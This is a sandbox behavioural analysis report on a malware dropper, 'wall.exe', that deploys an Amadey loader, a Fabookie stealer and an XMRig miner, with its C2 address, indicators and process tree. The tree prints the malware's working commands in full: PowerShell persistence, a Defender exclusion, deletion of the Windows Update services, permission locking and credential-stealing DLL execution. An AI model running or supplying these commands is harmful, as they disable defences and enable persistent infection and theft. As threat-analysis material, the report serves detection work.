Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
01/06/2023, 08:10
Static task
static1
Behavioral task
behavioral1
Sample
wall.exe
Resource
win7-20230220-en
General
-
Target
wall.exe
-
Size
4.9MB
-
MD5
014b9db957bdbafe8a48ec5cd4004f0e
-
SHA1
44ba905cfb83b80bda92553e378eb4600acbea91
-
SHA256
92f4134cc013553a811aa371570d7e2e66a2537b4eac3dbdeaf0cb5f02e6ec56
-
SHA512
775e1aa3905a1d01f2ca410b4e942ac8794bef3275057821736ebea755d5315318d7e1fadaca80a1c11f7dc1d527a586748f7ba5cd7201748e431848f079aae8
-
SSDEEP
98304:MdBY9slh4DJF1QWHc5ymiJA7MNMrL3HW4PD25u:MdBYh+WaaSrLD78
Malware Config
Extracted
amadey
3.67
45.9.74.80/0bjdn2Z/index.php
Signatures
-
Detect Fabookie payload 2 IoCs
resource yara_rule behavioral2/memory/4832-177-0x0000022DC24C0000-0x0000022DC25EF000-memory.dmp family_fabookie behavioral2/memory/4832-184-0x0000022DC24C0000-0x0000022DC25EF000-memory.dmp family_fabookie -
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
description pid Process procid_target PID 2280 created 2680 2280 XandETC.exe 75 PID 2280 created 2680 2280 XandETC.exe 75 PID 2280 created 2680 2280 XandETC.exe 75 PID 2280 created 2680 2280 XandETC.exe 75 PID 1180 created 2680 1180 updater.exe 75 PID 1180 created 2680 1180 updater.exe 75 PID 1180 created 2680 1180 updater.exe 75 PID 1180 created 2680 1180 updater.exe 75 PID 1180 created 2680 1180 updater.exe 75 PID 1180 created 2680 1180 updater.exe 75 PID 1180 created 2680 1180 updater.exe 75 -
XMRig Miner payload 7 IoCs
resource yara_rule behavioral2/memory/4536-329-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp xmrig behavioral2/memory/4536-332-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp xmrig behavioral2/memory/4536-333-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp xmrig behavioral2/memory/4536-335-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp xmrig behavioral2/memory/4536-338-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp xmrig behavioral2/memory/4536-341-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp xmrig behavioral2/memory/4536-344-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp xmrig -
Downloads MZ/PE file
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation wall.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation NewPlayer.exe Key value queried \REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation mnolyk.exe -
Executes dropped EXE 8 IoCs
pid Process 4832 aafg31.exe 2568 NewPlayer.exe 2280 XandETC.exe 224 mnolyk.exe 912 mnolyk.exe 1180 updater.exe 1432 mnolyk.exe 2176 mnolyk.exe -
Loads dropped DLL 2 IoCs
pid Process 3648 rundll32.exe 2068 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/memory/4536-329-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp upx behavioral2/memory/4536-332-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp upx behavioral2/memory/4536-333-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp upx behavioral2/memory/4536-335-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp upx behavioral2/memory/4536-338-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp upx behavioral2/memory/4536-341-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp upx behavioral2/memory/4536-344-0x00007FF74ADE0000-0x00007FF74B5D4000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1180 set thread context of 2420 1180 updater.exe 159 PID 1180 set thread context of 4536 1180 updater.exe 165 -
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Notepad\Chrome\updater.exe XandETC.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1664 sc.exe 3264 sc.exe 2248 sc.exe 4440 sc.exe 4560 sc.exe 2304 sc.exe 728 sc.exe 4088 sc.exe 728 sc.exe 3116 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4900 2068 WerFault.exe 131 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5032 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2280 XandETC.exe 2280 XandETC.exe 2548 powershell.exe 2548 powershell.exe 2280 XandETC.exe 2280 XandETC.exe 2280 XandETC.exe 2280 XandETC.exe 2280 XandETC.exe 2280 XandETC.exe 1320 powershell.exe 1320 powershell.exe 2280 XandETC.exe 2280 XandETC.exe 1176 powershell.exe 1176 powershell.exe 1180 updater.exe 1180 updater.exe 2560 powershell.exe 2560 powershell.exe 1180 updater.exe 1180 updater.exe 1180 updater.exe 1180 updater.exe 1180 updater.exe 1180 updater.exe 440 powershell.exe 440 powershell.exe 1180 updater.exe 1180 updater.exe 1180 updater.exe 1180 updater.exe 2420 conhost.exe 2420 conhost.exe 1180 updater.exe 1180 updater.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe 4536 conhost.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 664 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2548 powershell.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeShutdownPrivilege 3752 powercfg.exe Token: SeCreatePagefilePrivilege 3752 powercfg.exe Token: SeShutdownPrivilege 2064 powercfg.exe Token: SeCreatePagefilePrivilege 2064 powercfg.exe Token: SeShutdownPrivilege 4444 powercfg.exe Token: SeCreatePagefilePrivilege 4444 powercfg.exe Token: SeShutdownPrivilege 4820 powercfg.exe Token: SeCreatePagefilePrivilege 4820 powercfg.exe Token: SeIncreaseQuotaPrivilege 1320 powershell.exe Token: SeSecurityPrivilege 1320 powershell.exe Token: SeTakeOwnershipPrivilege 1320 powershell.exe Token: SeLoadDriverPrivilege 1320 powershell.exe Token: SeSystemProfilePrivilege 1320 powershell.exe Token: SeSystemtimePrivilege 1320 powershell.exe Token: SeProfSingleProcessPrivilege 1320 powershell.exe Token: SeIncBasePriorityPrivilege 1320 powershell.exe Token: SeCreatePagefilePrivilege 1320 powershell.exe Token: SeBackupPrivilege 1320 powershell.exe Token: SeRestorePrivilege 1320 powershell.exe Token: SeShutdownPrivilege 1320 powershell.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeSystemEnvironmentPrivilege 1320 powershell.exe Token: SeRemoteShutdownPrivilege 1320 powershell.exe Token: SeUndockPrivilege 1320 powershell.exe Token: SeManageVolumePrivilege 1320 powershell.exe Token: 33 1320 powershell.exe Token: 34 1320 powershell.exe Token: 35 1320 powershell.exe Token: 36 1320 powershell.exe Token: SeIncreaseQuotaPrivilege 1320 powershell.exe Token: SeSecurityPrivilege 1320 powershell.exe Token: SeTakeOwnershipPrivilege 1320 powershell.exe Token: SeLoadDriverPrivilege 1320 powershell.exe Token: SeSystemProfilePrivilege 1320 powershell.exe Token: SeSystemtimePrivilege 1320 powershell.exe Token: SeProfSingleProcessPrivilege 1320 powershell.exe Token: SeIncBasePriorityPrivilege 1320 powershell.exe Token: SeCreatePagefilePrivilege 1320 powershell.exe Token: SeBackupPrivilege 1320 powershell.exe Token: SeRestorePrivilege 1320 powershell.exe Token: SeShutdownPrivilege 1320 powershell.exe Token: SeDebugPrivilege 1320 powershell.exe Token: SeSystemEnvironmentPrivilege 1320 powershell.exe Token: SeRemoteShutdownPrivilege 1320 powershell.exe Token: SeUndockPrivilege 1320 powershell.exe Token: SeManageVolumePrivilege 1320 powershell.exe Token: 33 1320 powershell.exe Token: 34 1320 powershell.exe Token: 35 1320 powershell.exe Token: 36 1320 powershell.exe Token: SeIncreaseQuotaPrivilege 1320 powershell.exe Token: SeSecurityPrivilege 1320 powershell.exe Token: SeTakeOwnershipPrivilege 1320 powershell.exe Token: SeLoadDriverPrivilege 1320 powershell.exe Token: SeSystemProfilePrivilege 1320 powershell.exe Token: SeSystemtimePrivilege 1320 powershell.exe Token: SeProfSingleProcessPrivilege 1320 powershell.exe Token: SeIncBasePriorityPrivilege 1320 powershell.exe Token: SeCreatePagefilePrivilege 1320 powershell.exe Token: SeBackupPrivilege 1320 powershell.exe Token: SeRestorePrivilege 1320 powershell.exe Token: SeShutdownPrivilege 1320 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1560 wrote to memory of 4832 1560 wall.exe 82 PID 1560 wrote to memory of 4832 1560 wall.exe 82 PID 1560 wrote to memory of 2568 1560 wall.exe 83 PID 1560 wrote to memory of 2568 1560 wall.exe 83 PID 1560 wrote to memory of 2568 1560 wall.exe 83 PID 1560 wrote to memory of 2280 1560 wall.exe 84 PID 1560 wrote to memory of 2280 1560 wall.exe 84 PID 2568 wrote to memory of 224 2568 NewPlayer.exe 85 PID 2568 wrote to memory of 224 2568 NewPlayer.exe 85 PID 2568 wrote to memory of 224 2568 NewPlayer.exe 85 PID 224 wrote to memory of 5032 224 mnolyk.exe 86 PID 224 wrote to memory of 5032 224 mnolyk.exe 86 PID 224 wrote to memory of 5032 224 mnolyk.exe 86 PID 224 wrote to memory of 4508 224 mnolyk.exe 88 PID 224 wrote to memory of 4508 224 mnolyk.exe 88 PID 224 wrote to memory of 4508 224 mnolyk.exe 88 PID 4508 wrote to memory of 2884 4508 cmd.exe 90 PID 4508 wrote to memory of 2884 4508 cmd.exe 90 PID 4508 wrote to memory of 2884 4508 cmd.exe 90 PID 4508 wrote to memory of 2748 4508 cmd.exe 91 PID 4508 wrote to memory of 2748 4508 cmd.exe 91 PID 4508 wrote to memory of 2748 4508 cmd.exe 91 PID 4508 wrote to memory of 4672 4508 cmd.exe 92 PID 4508 wrote to memory of 4672 4508 cmd.exe 92 PID 4508 wrote to memory of 4672 4508 cmd.exe 92 PID 4508 wrote to memory of 3824 4508 cmd.exe 93 PID 4508 wrote to memory of 3824 4508 cmd.exe 93 PID 4508 wrote to memory of 3824 4508 cmd.exe 93 PID 4508 wrote to memory of 2116 4508 cmd.exe 94 PID 4508 wrote to memory of 2116 4508 cmd.exe 94 PID 4508 wrote to memory of 2116 4508 cmd.exe 94 PID 4508 wrote to memory of 3444 4508 cmd.exe 95 PID 4508 wrote to memory of 3444 4508 cmd.exe 95 PID 4508 wrote to memory of 3444 4508 cmd.exe 95 PID 4972 wrote to memory of 3264 4972 cmd.exe 112 PID 4972 wrote to memory of 3264 4972 cmd.exe 112 PID 4972 wrote to memory of 728 4972 cmd.exe 113 PID 4972 wrote to memory of 728 4972 cmd.exe 113 PID 4972 wrote to memory of 2248 4972 cmd.exe 115 PID 4972 wrote to memory of 2248 4972 cmd.exe 115 PID 4884 wrote to memory of 3752 4884 cmd.exe 114 PID 4884 wrote to memory of 3752 4884 cmd.exe 114 PID 4884 wrote to memory of 2064 4884 cmd.exe 116 PID 4884 wrote to memory of 2064 4884 cmd.exe 116 PID 4972 wrote to memory of 4440 4972 cmd.exe 117 PID 4972 wrote to memory of 4440 4972 cmd.exe 117 PID 4884 wrote to memory of 4444 4884 cmd.exe 118 PID 4884 wrote to memory of 4444 4884 cmd.exe 118 PID 4972 wrote to memory of 4088 4972 cmd.exe 119 PID 4972 wrote to memory of 4088 4972 cmd.exe 119 PID 4884 wrote to memory of 4820 4884 cmd.exe 120 PID 4884 wrote to memory of 4820 4884 cmd.exe 120 PID 4972 wrote to memory of 1844 4972 cmd.exe 121 PID 4972 wrote to memory of 1844 4972 cmd.exe 121 PID 4972 wrote to memory of 1860 4972 cmd.exe 122 PID 4972 wrote to memory of 1860 4972 cmd.exe 122 PID 4972 wrote to memory of 2920 4972 cmd.exe 123 PID 4972 wrote to memory of 2920 4972 cmd.exe 123 PID 4972 wrote to memory of 3884 4972 cmd.exe 124 PID 4972 wrote to memory of 3884 4972 cmd.exe 124 PID 4972 wrote to memory of 1200 4972 cmd.exe 125 PID 4972 wrote to memory of 1200 4972 cmd.exe 125 PID 1176 wrote to memory of 4084 1176 powershell.exe 128 PID 1176 wrote to memory of 4084 1176 powershell.exe 128 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:2680
-
C:\Users\Admin\AppData\Local\Temp\wall.exe"C:\Users\Admin\AppData\Local\Temp\wall.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Users\Admin\AppData\Local\Temp\aafg31.exe"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"3⤵
- Executes dropped EXE
PID:4832
-
-
C:\Users\Admin\AppData\Local\Temp\NewPlayer.exe"C:\Users\Admin\AppData\Local\Temp\NewPlayer.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe"C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:224 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\6d73a97b0c\mnolyk.exe" /F5⤵
- Creates scheduled task(s)
PID:5032
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\6d73a97b0c" /P "Admin:N"&&CACLS "..\6d73a97b0c" /P "Admin:R" /E&&Exit5⤵
- Suspicious use of WriteProcessMemory
PID:4508 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:2884
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "mnolyk.exe" /P "Admin:N"6⤵PID:2748
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "mnolyk.exe" /P "Admin:R" /E6⤵PID:4672
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"6⤵PID:3824
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\6d73a97b0c" /P "Admin:N"6⤵PID:2116
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\6d73a97b0c" /P "Admin:R" /E6⤵PID:3444
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main5⤵
- Loads dropped DLL
PID:3648 -
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main6⤵
- Loads dropped DLL
PID:2068 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2068 -s 6447⤵
- Program crash
PID:4900
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2280 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1320
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4972 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3264
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:728
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:2248
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:4440
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:4088
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:1844
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:1860
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:2920
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:3884
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:1200
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3752
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4444
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4820
-
-
-
